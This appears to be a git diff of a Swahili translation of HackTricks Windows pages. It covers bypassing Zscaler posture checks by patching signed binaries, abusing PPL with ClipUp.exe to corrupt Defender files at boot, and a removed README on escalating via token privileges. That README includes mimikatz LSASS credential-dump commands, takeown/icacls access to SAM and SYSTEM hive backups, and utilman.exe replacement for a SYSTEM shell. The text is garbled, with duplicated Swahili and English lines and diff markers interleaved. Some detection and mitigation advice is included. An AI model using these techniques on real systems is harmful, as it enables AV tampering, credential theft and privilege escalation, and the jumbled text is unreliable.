• Washa orodha ya kuzuia vulnerable-driver ya Microsoft (`HVCI`, `Smart App Control`) ili Windows ikatae kuingiza `AToolsKrnl64.sys`.
Subiri (monitor) uundaji wa services mpya za *kernel* na toa tahadhari wakati driver inapopewa load kutoka saraka inayoweza kuandikwa na kila mtu au ikiwa haiko kwenye allow-list.
Angalia handles za user-mode kwa device objects maalum ikifuatiwa na simu za kushangaza za `DeviceIoControl`.
### Kupitisha Ukaguzi wa Posture wa Zscaler Client Connector kupitia Patch ya Binary kwenye Disk
### Kuepuka Zscaler Client Connector Posture Checks kupitia On-Disk Binary Patching
Zscalers **Client Connector** inatekeleza sheria za device-posture kwa ndani kwenye mteja na inategemea Windows RPC kuwasilisha matokeo kwa vipengele vingine. Uamuzi mbaya wa muundo uliofanywa mara mbili unafanya bypass kamili kuwa inawezekana:
Zscalers **Client Connector** inatekeleza sheria za device-posture kwa mteja moja kwa moja na inategemea Windows RPC kuwasilisha matokeo kwa vipengele vingine. Chaguzi mbili za kubuni zenye udhaifu zinafanya uepukaji kamili uwezekane:
1. Tathmini ya posture hufanyika **kabisa upande wa mteja** (boolean inatumwa kwa server).
2. Internal RPC endpoints zinathibitisha tu kwamba executable inayounganisha ime **signed by Zscaler** (kupitia `WinVerifyTrust`).
1. Tathmini ya posture hufanyika **kikamilifu client-side** (boolean hutumwa kwa server).
2. Endpoints za ndani za RPC zinathibitisha tu kwamba executable inayounganisha imesainiwa na Zscaler (kwa kutumia `WinVerifyTrust`).
Kwa **kufanya patch kwa binaries nne zilizowekwa sahihi kwenye disk** njia zote mbili zinaweza kuondolewa:
Kwa **kupachika binaries zenye saini nne kwenye diski** mbinu zote mbili zinaweza kutolewa/kuzimwa:
| Binary | Original logic patched | Result |
|--------|------------------------|--------|
| `ZSATrayManager.exe` | `devicePostureCheck() → return 0/1` | Inarudi `1` kila wakati hivyo kila ukaguzi unaonekana umezingatia |
| `ZSAService.exe` | Indirect call to `WinVerifyTrust` | NOP-ed ⇒ mchakato wowote (hata usiosainiwa) anaweza kujiunga na RPC pipes |
| `ZSATrayHelper.dll` | `verifyZSAServiceFileSignature()` | Imebadilishwa na `mov eax,1 ; ret` |
| `ZSATunnel.exe` | Integrity checks on the tunnel | Imefupishwa (short-circuited) |
|--------|------------------------|---------|
| `ZSATrayManager.exe` | `devicePostureCheck() → return 0/1` | Inarudisha `1` kila wakati hivyo kila ukaguzi unakubalika |
| `ZSAService.exe` | Indirect call to `WinVerifyTrust` | NOP-ed ⇒ process yoyote (hata isiyosainiwa) inaweza ku-bind kwenye RPC pipes |
| `ZSATrayHelper.dll` | `verifyZSAServiceFileSignature()` | Imereplaced na `mov eax,1 ; ret` |
| `ZSATunnel.exe` | Integrity checks on the tunnel | Zimekataliwa / short-circuited |
Minimal patcher excerpt:
```python
@ -759,22 +761,22 @@ else:
f.seek(off)
f.write(replacement)
```
Baada ya kubadilisha faili za awali na kuwasha upya service stack:
Baada ya kubadilisha faili za awali na kuanzisha upya msururu wa huduma:
* **Zote** ukaguzi wa posture unaonyesha **kijani/kuzingatia**.
* Binaries zisizotiwa saini au zilizorekebishwa zinaweza kufungua named-pipe RPC endpoints (mfano `\\RPC Control\\ZSATrayManager_talk_to_me`).
* Host iliyoharibiwa inapata upatikanaji usiozuiliwa kwenye internal network iliyoainishwa na sera za Zscaler.
* **All** posture checks display **green/compliant**.
* Binaries zisizotiwa saini au zilizorekebishwa zinaweza kufungua named-pipe RPC endpoints (kwa mfano `\\RPC Control\\ZSATrayManager_talk_to_me`).
* Mshini uliodukuliwa unapata ufikiaji bila vikwazo wa mtandao wa ndani uliofafanuliwa na sera za Zscaler.
Somo hili la kesi linaonyesha jinsi maamuzi ya kuaminika upande wa mteja na ukaguzi rahisi wa saini yanavyoweza kushindwa kwa patches za byte chache.
Utafiti huu wa kesi unaonyesha jinsi maamuzi ya kuaminiana upande wa mteja na ukaguzi rahisi wa saini yanavyoweza kushindwa kwa patch ndogo za byte.
## Kutumia vibaya Protected Process Light (PPL) Ili Kudhuru AV/EDR kwa LOLBINs
## Kutumia vibaya Protected Process Light (PPL) To Tamper AV/EDR With LOLBINs
Protected Process Light (PPL) inatekeleza hierarchy ya signer/level ili mchakato uliolindwa wa kiwango sawa au cha juu tu uweze kuingilia wengine. Kivyovyote, kama unaweza kuanzisha kwa halali binary ienye PPL na kudhibiti argument zake, unaweza kubadilisha kazi zisizo hatari (kwa mfano, logging) kuwa primitive ndogo ya kuandika iliyo salimishwa na PPL dhidi ya saraka zilizo salimishwa zinazotumika na AV/EDR.
Protected Process Light (PPL) inatekeleza hierarchy ya signer/level ili tu michakato iliyolindwa yenye kiwango sawa au cha juu iweze kuhujumiwa miongoni mwao. Kwa upande wa shambulizi, ikiwa unaweza kuanzisha kwa halali binary iliyo na PPL na kudhibiti arguments zake, unaweza kubadilisha utendakazi usio hatari (kwa mfano, logging) kuwa primitive ya kuandika iliyodhibitiwa, inayoungwa mkono na PPL dhidi ya saraka zilizolindwa zinazotumika na AV/EDR.
Nini kinachofanya mchakato uendeshe kama PPL
- EXE lengwa (na DLLs zozote zilizopakiwa) lazima zisainwe na EKU inayokubali PPL.
- Mchakato lazima uundwe kwa CreateProcess ukitumia flags: `EXTENDED_STARTUPINFO_PRESENT | CREATE_PROTECTED_PROCESS`.
- Kiwango cha ulinzi kinachofaa lazima kitaombiwe kinacholingana na signer wa binary (kwa mfano, `PROTECTION_LEVEL_ANTIMALWARE_LIGHT` kwa anti-malware signers, `PROTECTION_LEVEL_WINDOWS` kwa Windows signers). Viwango visivyofaa vitashindwa wakati wa uundaji.
What makes a process run as PPL
- The target EXE (and any loaded DLLs) must be signed with a PPL-capable EKU.
- The process must be created with CreateProcess using the flags: `EXTENDED_STARTUPINFO_PRESENT | CREATE_PROTECTED_PROCESS`.
- A compatible protection level must be requested that matches the signer of the binary (e.g., `PROTECTION_LEVEL_ANTIMALWARE_LIGHT` for anti-malware signers, `PROTECTION_LEVEL_WINDOWS` for Windows signers). Wrong levels will fail at creation.
See also a broader intro to PP/PPL and LSASS protection here:
@ -783,9 +785,9 @@ stealing-credentials/credentials-protections.md
{{#endref}}
Launcher tooling
- Open-source helper: CreateProcessAsPPL (selects protection level and forwards arguments to the target EXE):
- Msaidizi wa chanzo wazi: CreateProcessAsPPL (huchagua protection level na hupitisha arguments kwa EXE lengwa):
- [https://github.com/2x7EQ13/CreateProcessAsPPL](https://github.com/2x7EQ13/CreateProcessAsPPL)
- Mfano wa matumizi:
- Usage pattern:
```text
CreateProcessAsPPL.exe <level 0..4> <path-to-ppl-capable-exe> [args...]
# example: spawn a Windows-signed component at PPL level 1 (Windows)
@ -794,41 +796,41 @@ CreateProcessAsPPL.exe 1 C:\Windows\System32\ClipUp.exe <args>
CreateProcessAsPPL.exe 3 <anti-malware-signed-exe> <args>
```
LOLBIN primitive: ClipUp.exe
- The signed system binary `C:\Windows\System32\ClipUp.exe` self-spawns and accepts a parameter to write a log file to a caller-specified path.
- When launched as a PPL process, the file write occurs with PPL backing.
- ClipUp cannot parse paths containing spaces; use 8.3 short paths to point into normally protected locations.
- Binary ya mfumo iliyosainiwa `C:\Windows\System32\ClipUp.exe` inajizalisha yenyewe na inakubali parameter ya kuandika faili ya log kwenye njia iliyotajwa na mtumiaji.
- Iwapo itaendeshwa kama mchakato wa PPL, uandishi wa faili hufanyika kwa msaada wa PPL.
- ClipUp haiwezi kuchanganua njia zenye nafasi; tumia njia fupi za 8.3 kuonyesha maeneo ambayo kawaida yanalindwa.
8.3 short path helpers
- Orodhesha short names: `dir /x` katika kila parent directory.
- Tengeneza short path kwenye cmd: `for %A in ("C:\ProgramData\Microsoft\Windows Defender\Platform") do @echo %~sA`
- Orodhesha majina mafupi: `dir /x` katika kila saraka mzazi.
- Pata njia fupi katika cmd: `for %A in ("C:\ProgramData\Microsoft\Windows Defender\Platform") do @echo %~sA`
Abuse chain (abstract)
1) Anzisha the PPL-capable LOLBIN (ClipUp) na `CREATE_PROTECTED_PROCESS` kwa kutumia launcher (mfano: CreateProcessAsPPL).
2) Pasa ClipUp log-path argument ili kulazimisha file creation ndani ya protected AV directory (mfano: Defender Platform). Tumia 8.3 short names ikiwa inahitajika.
3) Ikiwa target binary kwa kawaida iko wazi/imefungwa na AV wakati inakimbia (mfano: MsMpEng.exe), panga the write wakati wa boot kabla AV inaanza kwa kuinstall auto-start service inayokimbia mapema kwa uhakika. Thibitisha boot ordering na Process Monitor (boot logging).
4) Baada ya reboot, the PPL-backed write inatokea kabla AV itakapo lock binaries zake, ikiharibu the target file na kuzuia startup.
1) Anzisha LOLBIN inayoweza PPL (ClipUp) kwa `CREATE_PROTECTED_PROCESS` ukitumia launcher (kwa mfano CreateProcessAsPPL).
2) Pitisha hoja ya log-path ya ClipUp ili kulazimisha uundaji wa faili katika saraka ya AV inayolindwa (kwa mfano, Defender Platform). Tumia majina mafupi ya 8.3 ikiwa inahitajika.
3) Ikiwa binary lengwa kwa kawaida iko wazi/imefungwa na AV wakati inapoendesha (kwa mfano, MsMpEng.exe), panga uandishi wakati wa boot kabla AV haijaanza kwa kusanidi service ya kuanzisha kiotomatiki ambayo inafanya kazi mapema kwa uhakika. Thibitisha mpangilio wa boot kwa kutumia Process Monitor (boot logging).
4) Baada ya reboot uandishi unaoungwa mkono na PPL hutokea kabla AV haijafunga binaries zake, ukaharibu faili lengwa na kuzuia startup.
Mfano wa invocation (paths zimefichwa/zimefupishwa kwa usalama):
Mfano wa kuitisha (njia zimefichwa/zimefupishwa kwa usalama):
```text
# Run ClipUp as PPL at Windows signer level (1) and point its log to a protected folder using 8.3 names
CreateProcessAsPPL.exe 1 C:\Windows\System32\ClipUp.exe -ppl C:\PROGRA~3\MICROS~1\WINDOW~1\Platform\<ver>\samplew.dll
```
Notes and constraints
- Huwezi kudhibiti yaliyomo ambayo ClipUp inaandika zaidi ya mahali pa kuweka; primitive inafaa zaidi kwa uharibifu kuliko kwa kuingiza maudhui kwa usahihi.
- Inahitaji local admin/SYSTEM ili kusanidi/kuanza service na dirisha la reboot.
- Huwezi kudhibiti yaliyomo ambayo ClipUp inaandika zaidi ya mahali; primitive hii inafaa kwa uharibifu badala ya uingizaji sahihi la yaliyomo.
- Inahitaji local admin/SYSTEM ili kusanidi/kuanza service na dirisha la kuwasha upya.
- Muda ni muhimu: lengo halipaswi kuwa wazi; utekelezaji wakati wa boot huzuia kufungwa kwa faili.
Detections
- Uundaji wa mchakato wa `ClipUp.exe` kwa hoja zisizo za kawaida, hasa ukiwa umeparentwa na launchers zisizo za kawaida, karibu na boot.
- New services zilizowekwa kuanza-auto-start binaries zenye mashaka na kuanza mara kwa mara kabla ya Defender/AV. Chunguza service creation/modification kabla ya Defender startup failures.
- File integrity monitoring kwenye Defender binaries/Platform directories; uundaji/marekebisho ya faili yasiyotegemewa na michakato yenye protected-process flags.
- ETW/EDR telemetry: angalia michakato iliyoundwa kwa `CREATE_PROTECTED_PROCESS` na matumizi ya kiwango cha PPL isiyo ya kawaida na binaries zisizo za AV.
- Uundaji wa mchakato wa `ClipUp.exe` na hoja zisizo za kawaida, hasa ukiwa umewekwa chini ya launchers zisizo za kawaida, karibu na boot.
- Services mpya zilizosanidiwa kuanza moja kwa moja binaries zenye kuhatarisha na kuanza kwa urahisi kabla ya Defender/AV. Chunguza uundaji/urekebishaji wa service kabla ya kushindwa kwa startup kwa Defender.
- Ufuatiliaji wa uadilifu wa faili kwenye Defender binaries/Platform directories; uundaji/urekebishaji wa faili usiotarajiwa na michakato yenye protected-process flags.
- ETW/EDR telemetry: tafuta michakato iliyoundwa na `CREATE_PROTECTED_PROCESS` na matumizi yasiyo ya kawaida ya ngazi za PPL na binaries ambazo si-AV.
Mitigations
- WDAC/Code Integrity: zuia ni binaries zipi zilizosainiwa zinaweza kuendesha kama PPL na chini ya wazazi gani; zuia ClipUp invocation nje ya muktadha halali.
- Service hygiene: zuia creation/modification ya auto-start services na fuatilia start-order manipulation.
- Hakikisha Defender tamper protection na early-launch protections ziko enabled; chunguza startup errors zinazoashiria binary corruption.
- Fikiria kuzima 8.3 short-name generation kwenye volumes zinazohifadhi security tooling ikiwa inafaa kwa mazingira yako (test thoroughly).
- WDAC/Code Integrity: zuia ni binaries zipi zilizosainiwa zinaweza kukimbia kama PPL na chini ya wazazi gani; zuia mwito wa ClipUp nje ya muktadha halali.
- Service hygiene: zuia uundaji/urekebishaji wa services za auto-start na fuatilia uchezaji wa mpangilio wa kuanza.
- Hakikisha Defender tamper protection na early-launch protections zimeshashawaka; chunguza makosa ya startup yanayoonyesha uharibifu wa binary.
- Fikiria kuzima 8.3 short-name generation kwenye volumes zinazoendesha zana za usalama ikiwa inafaa kwa mazingira yako (jaribu kwa kina).
References for PPL and tooling
- Microsoft Protected Processes overview: https://learn.microsoft.com/windows/win32/procthread/protected-processes
@ -837,7 +839,7 @@ References for PPL and tooling
- CreateProcessAsPPL launcher: https://github.com/2x7EQ13/CreateProcessAsPPL
- Technique writeup (ClipUp + PPL + boot-order tamper): https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html
## Marejeleo
## References
- [Unit42 New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer](https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/)
- [Synacktiv Should you trust your zero trust? Bypassing Zscaler posture checks](https://www.synacktiv.com/en/publications/should-you-trust-your-zero-trust-bypassing-zscaler-posture-checks.html)

180
src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md
View File

@ -1,180 +0,0 @@
# Abusing Tokens
{{#include ../../../banners/hacktricks-training.md}}
## Tokens
Ikiwa **hujui ni nini Windows Access Tokens** soma ukurasa huu kabla ya kuendelea:
{{#ref}}
../access-tokens.md
{{#endref}}
**Labda unaweza kuweza kupandisha mamlaka kwa kutumia tokens ulizonazo tayari**
### SeImpersonatePrivilege
Hii ni mamlaka ambayo inashikiliwa na mchakato wowote inaruhusu uigaji (lakini si uundaji) wa token yoyote, ikiwa tu mkono wake unaweza kupatikana. Token yenye mamlaka inaweza kupatikana kutoka kwa huduma ya Windows (DCOM) kwa kuifanya ifanye uthibitishaji wa NTLM dhidi ya exploit, kisha kuwezesha utekelezaji wa mchakato wenye mamlaka ya SYSTEM. Uthibitisho huu unaweza kutumika kwa kutumia zana mbalimbali, kama [juicy-potato](https://github.com/ohpe/juicy-potato), [RogueWinRM](https://github.com/antonioCoco/RogueWinRM) (ambayo inahitaji winrm kuzuiliwa), [SweetPotato](https://github.com/CCob/SweetPotato), [EfsPotato](https://github.com/zcgonvh/EfsPotato), [DCOMPotato](https://github.com/zcgonvh/DCOMPotato) na [PrintSpoofer](https://github.com/itm4n/PrintSpoofer).
{{#ref}}
../roguepotato-and-printspoofer.md
{{#endref}}
{{#ref}}
../juicypotato.md
{{#endref}}
### SeAssignPrimaryPrivilege
Ni sawa sana na **SeImpersonatePrivilege**, itatumia **njia ile ile** kupata token yenye mamlaka.\
Kisha, mamlaka hii inaruhusu **kupewa token ya msingi** kwa mchakato mpya/uliokamatwa. Kwa token ya uigaji yenye mamlaka unaweza kuunda token ya msingi (DuplicateTokenEx).\
Kwa token hiyo, unaweza kuunda **mchakato mpya** kwa 'CreateProcessAsUser' au kuunda mchakato uliokamatwa na **kuiweka token** (kwa ujumla, huwezi kubadilisha token ya msingi ya mchakato unaoendelea).
### SeTcbPrivilege
Ikiwa umewezeshwa token hii unaweza kutumia **KERB_S4U_LOGON** kupata **token ya uigaji** kwa mtumiaji mwingine yeyote bila kujua nywila, **ongeza kundi lolote** (admins) kwenye token, weka **kiwango cha uaminifu** cha token kuwa "**medium**", na kupewa token hii kwa **thread ya sasa** (SetThreadToken).
### SeBackupPrivilege
Mfumo unalazimishwa **kutoa udhibiti wa ufikiaji wa kusoma** kwa faili yoyote (iliyopunguzwa kwa operesheni za kusoma) kwa mamlaka hii. Inatumika kwa **kusoma hash za nywila za akaunti za Msimamizi wa ndani** kutoka kwenye rejista, baada ya hapo, zana kama "**psexec**" au "**wmiexec**" zinaweza kutumika na hash hiyo (Pass-the-Hash technique). Hata hivyo, mbinu hii inashindwa chini ya hali mbili: wakati akaunti ya Msimamizi wa ndani imezuiliwa, au wakati sera ipo inayondoa haki za kiutawala kutoka kwa Wasimamizi wa ndani wanaounganisha kwa mbali.\
Unaweza **kuitumia mamlaka hii** kwa:
- [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1)
- [https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug)
- kufuata **IppSec** katika [https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab_channel=IppSec](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610&ab_channel=IppSec)
- Au kama ilivyoelezwa katika sehemu ya **kupandisha mamlaka na Opereta wa Backup** ya:
{{#ref}}
../../active-directory-methodology/privileged-groups-and-token-privileges.md
{{#endref}}
### SeRestorePrivilege
Ruhusa ya **ufikiaji wa kuandika** kwa faili yoyote ya mfumo, bila kujali Orodha ya Udhibiti wa Ufikiaji (ACL) ya faili hiyo, inatolewa na mamlaka hii. Inafungua uwezekano mwingi wa kupandisha, ikiwa ni pamoja na uwezo wa **kubadilisha huduma**, kufanya DLL Hijacking, na kuweka **debuggers** kupitia Chaguzi za Utekelezaji wa Faili ya Picha kati ya mbinu nyingine mbalimbali.
### SeCreateTokenPrivilege
SeCreateTokenPrivilege ni ruhusa yenye nguvu, hasa inavyofaa wakati mtumiaji ana uwezo wa kuigiza tokens, lakini pia katika ukosefu wa SeImpersonatePrivilege. Uwezo huu unategemea uwezo wa kuigiza token inayowakilisha mtumiaji yule yule na ambayo kiwango chake cha uaminifu hakizidi kile cha mchakato wa sasa.
**Mambo Muhimu:**
- **Uigaji bila SeImpersonatePrivilege:** Inawezekana kutumia SeCreateTokenPrivilege kwa EoP kwa kuigiza tokens chini ya hali maalum.
- **Hali za Uigaji wa Token:** Uigaji wenye mafanikio unahitaji token lengwa kuwa ya mtumiaji yule yule na kuwa na kiwango cha uaminifu ambacho ni kidogo au sawa na kiwango cha uaminifu wa mchakato unaojaribu kuigiza.
- **Uundaji na Ubadilishaji wa Tokens za Uigaji:** Watumiaji wanaweza kuunda token ya uigaji na kuiboresha kwa kuongeza SID ya kundi lenye mamlaka (Security Identifier).
### SeLoadDriverPrivilege
Ruhusa hii inaruhusu **kupakia na kuondoa madereva ya vifaa** kwa kuunda kipengele cha rejista chenye thamani maalum za `ImagePath` na `Type`. Kwa kuwa ufikiaji wa moja kwa moja wa kuandika kwenye `HKLM` (HKEY_LOCAL_MACHINE) umepunguzika, `HKCU` (HKEY_CURRENT_USER) lazima itumike badala yake. Hata hivyo, ili kufanya `HKCU` itambulike kwa kernel kwa ajili ya usanidi wa dereva, njia maalum lazima ifuatwe.
Njia hii ni `\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName`, ambapo `<RID>` ni Kitambulisho cha Kijamii cha mtumiaji wa sasa. Ndani ya `HKCU`, njia hii yote lazima iundwe, na thamani mbili zinahitaji kuwekwa:
- `ImagePath`, ambayo ni njia ya binary itakayotekelezwa
- `Type`, ikiwa na thamani ya `SERVICE_KERNEL_DRIVER` (`0x00000001`).
**Hatua za Kufuatia:**
1. Fikia `HKCU` badala ya `HKLM` kutokana na ufikiaji wa kuandika uliozuiliwa.
2. Unda njia `\Registry\User\<RID>\System\CurrentControlSet\Services\DriverName` ndani ya `HKCU`, ambapo `<RID>` inawakilisha Kitambulisho cha Kijamii cha mtumiaji wa sasa.
3. Weka `ImagePath` kuwa njia ya utekelezaji wa binary.
4. Weka `Type` kama `SERVICE_KERNEL_DRIVER` (`0x00000001`).
```python
# Example Python code to set the registry values
import winreg as reg
# Define the path and values
path = r'Software\YourPath\System\CurrentControlSet\Services\DriverName' # Adjust 'YourPath' as needed
key = reg.OpenKey(reg.HKEY_CURRENT_USER, path, 0, reg.KEY_WRITE)
reg.SetValueEx(key, "ImagePath", 0, reg.REG_SZ, "path_to_binary")
reg.SetValueEx(key, "Type", 0, reg.REG_DWORD, 0x00000001)
reg.CloseKey(key)
```
Zaidi ya njia za kutumia ruhusa hii katika [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges#seloaddriverprivilege](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges#seloaddriverprivilege)
### SeTakeOwnershipPrivilege
Hii ni sawa na **SeRestorePrivilege**. Kazi yake kuu inaruhusu mchakato **kuchukua umiliki wa kitu**, ikiepuka hitaji la ufikiaji wa hiari kupitia utoaji wa haki za WRITE_OWNER. Mchakato huu unahusisha kwanza kupata umiliki wa funguo za rejista zinazokusudiwa kwa madhumuni ya kuandika, kisha kubadilisha DACL ili kuwezesha operesheni za kuandika.
```bash
takeown /f 'C:\some\file.txt' #Now the file is owned by you
icacls 'C:\some\file.txt' /grant <your_username>:F #Now you have full access
# Use this with files that might contain credentials such as
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
c:\inetpub\wwwwroot\web.config
```
### SeDebugPrivilege
Haki hii inaruhusu **kudebug mchakato mingine**, ikiwa ni pamoja na kusoma na kuandika katika kumbukumbu. Mikakati mbalimbali za kuingiza kumbukumbu, zinazoweza kukwepa suluhisho nyingi za antivirus na ulinzi wa uvamizi wa mwenyeji, zinaweza kutumika kwa haki hii.
#### Dump memory
Unaweza kutumia [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) kutoka kwa [SysInternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) au [SharpDump](https://github.com/GhostPack/SharpDump) ili **kukamata kumbukumbu ya mchakato**. Kwa hakika, hii inaweza kutumika kwa mchakato wa **Local Security Authority Subsystem Service ([LSASS](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service))**, ambao unawajibika kuhifadhi akidi za mtumiaji mara tu mtumiaji anapofanikiwa kuingia kwenye mfumo.
Kisha unaweza kupakia dump hii katika mimikatz ili kupata nywila:
```
mimikatz.exe
mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
```
#### RCE
Ikiwa unataka kupata `NT SYSTEM` shell unaweza kutumia:
- [**SeDebugPrivilege-Exploit (C++)**](https://github.com/bruno-1337/SeDebugPrivilege-Exploit)
- [**SeDebugPrivilegePoC (C#)**](https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations/SeDebugPrivilegePoC)
- [**psgetsys.ps1 (Powershell Script)**](https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1)
```bash
# Get the PID of a process running as NT SYSTEM
import-module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>)
```
### SeManageVolumePrivilege
`SeManageVolumePrivilege` ni haki ya mtumiaji wa Windows inayowezesha watumiaji kusimamia kiasi za diski, ikiwa ni pamoja na kuunda na kufuta. Ingawa inakusudiwa kwa wasimamizi, ikiwa itatolewa kwa watumiaji wasiokuwa wasimamizi, inaweza kutumika kwa ajili ya kupandisha hadhi.
Inawezekana kutumia haki hii kudhibiti kiasi, na kusababisha ufikiaji kamili wa kiasi. [SeManageVolumeExploit](https://github.com/CsEnox/SeManageVolumeExploit) inaweza kutumika kutoa ufikiaji kamili kwa watumiaji wote kwa C:\
Zaidi ya hayo, mchakato ulioelezewa katika [hiki kifungu cha Medium](https://medium.com/@raphaeltzy13/exploiting-semanagevolumeprivilege-with-dll-hijacking-windows-privilege-escalation-1a4f28372d37) unaelezea kutumia DLL hijacking pamoja na `SeManageVolumePrivilege` ili kupandisha hadhi. Kwa kuweka payload DLL `C:\Windows\System32\wbem\tzres.dll` na kuita `systeminfo`, dll inatekelezwa.
## Check privileges
```
whoami /priv
```
**tokens ambazo zinaonekana kama Zimezimwa** zinaweza kuwezeshwa, unaweza kweli kutumia _Zimewezeshwa_ na _Zimezimwa_ tokens.
### Wezesha Tokens Zote
Ikiwa una tokens zilizozimwa, unaweza kutumia script [**EnableAllTokenPrivs.ps1**](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1) kuwezesha tokens zote:
```bash
.\EnableAllTokenPrivs.ps1
whoami /priv
```
Or the **script** embed in this [**post**](https://www.leeholmes.com/adjusting-token-privileges-in-powershell/).
## Table
Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin), summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files.
| Privilege | Impact | Tool | Execution path | Remarks |
| -------------------------- | ----------- | ----------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| **`SeAssignPrimaryToken`** | _**Admin**_ | 3rd party tool | _"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"_ | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon. |
| **`SeBackup`** | **Threat** | _**Built-in commands**_ | Soma faili nyeti kwa kutumia `robocopy /b` | <p>- Inaweza kuwa ya kuvutia zaidi ikiwa unaweza kusoma %WINDIR%\MEMORY.DMP<br><br>- <code>SeBackupPrivilege</code> (na robocopy) si ya msaada linapokuja suala la kufungua faili.<br><br>- Robocopy inahitaji SeBackup na SeRestore kufanya kazi na /b parameter.</p> |
| **`SeCreateToken`** | _**Admin**_ | 3rd party tool | Unda token isiyo na mipaka ikiwa ni pamoja na haki za admin za ndani kwa kutumia `NtCreateToken`. | |
| **`SeDebug`** | _**Admin**_ | **PowerShell** | Nakili token ya `lsass.exe`. | Script inapatikana katika [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) |
| **`SeLoadDriver`** | _**Admin**_ | 3rd party tool | <p>1. Pakia dereva wa kernel wenye makosa kama <code>szkg64.sys</code><br>2. Fanya matumizi ya udhaifu wa dereva<br><br>Vinginevyo, haki hiyo inaweza kutumika kuondoa madereva yanayohusiana na usalama kwa kutumia amri ya <code>ftlMC</code> iliyojengwa. yaani: <code>fltMC sysmondrv</code></p> | <p>1. Udhaifu wa <code>szkg64</code> umeorodheshwa kama <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732">CVE-2018-15732</a><br>2. <code>szkg64</code> <a href="https://www.greyhathacker.net/?p=1025">kanuni ya udhaifu</a> iliundwa na <a href="https://twitter.com/parvezghh">Parvez Anwar</a></p> |
| **`SeRestore`** | _**Admin**_ | **PowerShell** | <p>1. Anzisha PowerShell/ISE ikiwa haki ya SeRestore ipo.<br>2. Wezesha haki hiyo kwa kutumia <a href="https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1">Enable-SeRestorePrivilege</a>).<br>3. Badilisha utilman.exe kuwa utilman.old<br>4. Badilisha cmd.exe kuwa utilman.exe<br>5. Funga console na bonyeza Win+U</p> | <p>Shambulio linaweza kugunduliwa na baadhi ya programu za AV.</p><p>Njia mbadala inategemea kubadilisha binaries za huduma zilizohifadhiwa katika "Program Files" kwa kutumia haki hiyo hiyo</p> |
| **`SeTakeOwnership`** | _**Admin**_ | _**Built-in commands**_ | <p>1. <code>takeown.exe /f "%windir%\system32"</code><br>2. <code>icalcs.exe "%windir%\system32" /grant "%username%":F</code><br>3. Badilisha cmd.exe kuwa utilman.exe<br>4. Funga console na bonyeza Win+U</p> | <p>Shambulio linaweza kugunduliwa na baadhi ya programu za AV.</p><p>Njia mbadala inategemea kubadilisha binaries za huduma zilizohifadhiwa katika "Program Files" kwa kutumia haki hiyo hiyo.</p> |
| **`SeTcb`** | _**Admin**_ | 3rd party tool | <p>Manipulate tokens ili kuwa na haki za admin za ndani. Inaweza kuhitaji SeImpersonate.</p><p>Ithibitishwe.</p> | |
## Reference
- Take a look to this table defining Windows tokens: [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin)
- Take a look to [**this paper**](https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt) about privesc with tokens.
{{#include ../../../banners/hacktricks-training.md}}